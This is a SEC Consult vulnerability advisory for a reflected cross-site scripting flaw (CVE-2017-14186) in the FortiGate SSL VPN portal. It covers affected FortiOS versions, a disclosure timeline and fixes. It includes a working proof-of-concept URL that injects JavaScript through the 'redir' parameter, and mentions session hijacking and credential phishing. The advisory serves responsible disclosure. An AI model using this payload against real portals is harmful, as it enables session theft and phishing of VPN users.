FortiGate SSL VPN Portal 5.x Cross Site Scripting Vulnerability

=======================================================================
              title: FortiGate SSL VPN Portal XSS Vulnerability
            product: Fortinet FortiOS
 vulnerable version: see: Vulnerable / tested versions
      fixed version: see: Solution
         CVE number: CVE-2017-14186
             impact: Medium
           homepage: https://www.fortinet.com
              found: 2017-10-02
                 by: Stefan Viehböck (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"From the start, the Fortinet vision has been to deliver broad, truly
integrated, high-performance security across the IT infrastructure.

We provide top-rated network and content security, as well as secure access
products that share intelligence and work together to form a cooperative
fabric. Our unique security fabric combines Security Processors, an intuitive
operating system, and applied threat intelligence to give you proven security,
exceptional performance, and better visibility and control--while providing
easier administration."

Source: https://www.fortinet.com/corporate/about-us/about-us.html


Vulnerability overview/description:
-----------------------------------
The FortiGate SSL VPN Portal is prone to a reflected cross-site scripting (XSS)
vulnerability. The HTTP GET parameter "redir" is vulnerable.
An attacker can exploit this vulnerability by tricking a victim to visit a URL.
The attacker is able to hijack the session of the attacked user, and use this
vulnerability in the course of spear-phishing attacks, e.g. by displaying a
login prompt that sends credentials of victim back to the attacker.

Note: This vulnerability is also an open redirect and is very similar to a
vulnerability that was fixed in FortiOS in March 2016 (FG-IR-16-004).
https://www.fortiguard.com/psirt/fortios-open-redirect-vulnerability


Proof of concept:
-----------------
The following request exploits the issue:
https://vpn.<SERVER>.com/remote/loginredir?redir=javascript:alert(%22XSS%20%22%2Bdocument.location)


The server responds with a page that looks as follows:
---------------------------------------------------------------------------------------------------
<html><head>
<script language="javascript">
document.location=decodeURIComponent("javascript%3Aalert%28%22XSS%20%22%2Bdocument.location%29");
</script>
</head></html>
---------------------------------------------------------------------------------------------------


Vulnerable / tested versions:
-----------------------------
FortiOS 5.6.0 -> 5.6.2
FortiOS 5.4.0 -> 5.4.6
FortiOS 5.2.0 -> 5.2.12
FortiOS 5.0 and below

More information can be found at:
https://fortiguard.com/psirt/FG-IR-17-242


Vendor contact timeline:
------------------------
2017-10-02: Contacting vendor through [email protected]
2017-10-03: Vendor confirms vulnerability, assigns CVE-2017-14186. Expected fix in
            version 5.6.3
2017-11-23: Vendor provides update
2017-11-29: Coordinated public release of advisory


Solution:
---------
FortiOS 5.6 branch: Upgrade to upcoming 5.6.3 (ETA: November 27th)
FortiOS 5.4 branch: Upgrade to 5.4.6 special build (*) or upcoming 5.4.7 (ETA Dec
7th)
FortiOS 5.2 branch: Upgrade to 5.2.12 special build (*) or upcoming 5.2.13 (ETA:
Dec 14th)

More information can be found at:
https://fortiguard.com/psirt/FG-IR-17-242


Workaround:
-----------
Not available.

#  0day.today [2018-01-05]  #